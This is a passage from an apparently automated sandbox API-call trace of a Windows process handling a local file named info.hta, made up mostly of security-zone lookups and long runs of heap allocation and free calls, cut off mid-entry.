This=0x5e1b98, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef138, pcbSecurityId=0x1ef134*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef138*=0x66, pcbSecurityId=0x1ef134*=0x9) returned 0x0 [0226.672] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef138, pcbSecurityId=0x1ef134*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef138*=0x0, pcbSecurityId=0x1ef134*=0x200) returned 0x800c0011 [0226.672] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d8058 | out: hHeap=0x590000) returned 1 [0226.672] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0226.672] IUri:GetPropertyDWORD (in: This=0x5bc0bc, uriProp=0x11, pdwProperty=0x1ef30c, dwFlags=0x0 | out: pdwProperty=0x1ef30c*=0x9) returned 0x0 [0226.672] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0226.672] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5d8058 [0226.672] IInternetSecurityManager:GetSecurityId (in: This=0x5e1b98, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef368, pcbSecurityId=0x1ef364*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef368*=0x66, pcbSecurityId=0x1ef364*=0x9) returned 0x0 [0226.672] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef368, pcbSecurityId=0x1ef364*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef368*=0x0, pcbSecurityId=0x1ef364*=0x200) returned 0x800c0011 [0226.672] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d8058 | out: hHeap=0x590000) returned 1 [0226.672] IUnknown:AddRef (This=0x5bbf0c) returned 0xc [0226.672] IUri:GetPropertyDWORD (in: This=0x5bbf0c, uriProp=0x11, pdwProperty=0x1ef0dc, dwFlags=0x0 | out: pdwProperty=0x1ef0dc*=0x9) returned 0x0 [0226.672] IUnknown:Release (This=0x5bbf0c) returned 0xb [0226.673] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5d8058 [0226.673] IInternetSecurityManager:GetSecurityId (in: This=0x5e1b98, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef138, pcbSecurityId=0x1ef134*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef138*=0x66, pcbSecurityId=0x1ef134*=0x9) returned 0x0 [0226.673] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef138, pcbSecurityId=0x1ef134*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef138*=0x0, pcbSecurityId=0x1ef134*=0x200) returned 0x800c0011 [0226.673] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d8058 | out: hHeap=0x590000) returned 1 [0226.821] IUnknown:Release (This=0x5a0570) returned 0x1 [0226.821] IUnknown:Release (This=0x5bbf0c) returned 0xa [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c4438 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b36c0 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cdf48 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd688 | out: hHeap=0x590000) returned 1 [0226.821] GetCurrentThreadId () returned 0x36c [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c3b70 | out: hHeap=0x590000) returned 1 [0226.821] GetCurrentThreadId () returned 0x36c [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.821] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cdef0 | out: hHeap=0x590000) returned 1 [0226.821] ValidateRect (hWnd=0x3016a, lpRect=0x0) returned 1 [0226.821] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0226.821] IUri:GetPropertyDWORD (in: This=0x5bc0bc, uriProp=0x11, pdwProperty=0x1ef30c, dwFlags=0x0 | out: pdwProperty=0x1ef30c*=0x9) returned 0x0 [0226.821] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0226.821] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5d83a0 [0226.821] IInternetSecurityManager:GetSecurityId (in: This=0x5e1b98, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef370, pcbSecurityId=0x1ef36c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef370*=0x66, pcbSecurityId=0x1ef36c*=0x9) returned 0x0 [0226.821] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef370, pcbSecurityId=0x1ef36c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef370*=0x0, pcbSecurityId=0x1ef36c*=0x200) returned 0x800c0011 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d83a0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bdc80 | out: hHeap=0x590000) returned 1 [0226.822] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9) returned 0x5bdc80 [0226.822] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ce310 | out: hHeap=0x590000) returned 1 [0226.822] GetTickCount () returned 0x209df [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] CoTaskMemAlloc (cb=0x6d) returned 0x5eaa38 [0226.822] CoTaskMemAlloc (cb=0x9) returned 0x5fd6d0 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c42d0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bddd0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b3460 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b3440 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cdaa0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a3fc0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b34a0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c42f8 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bdde8 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.822] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.824] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bde00 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bdda0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.825] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree 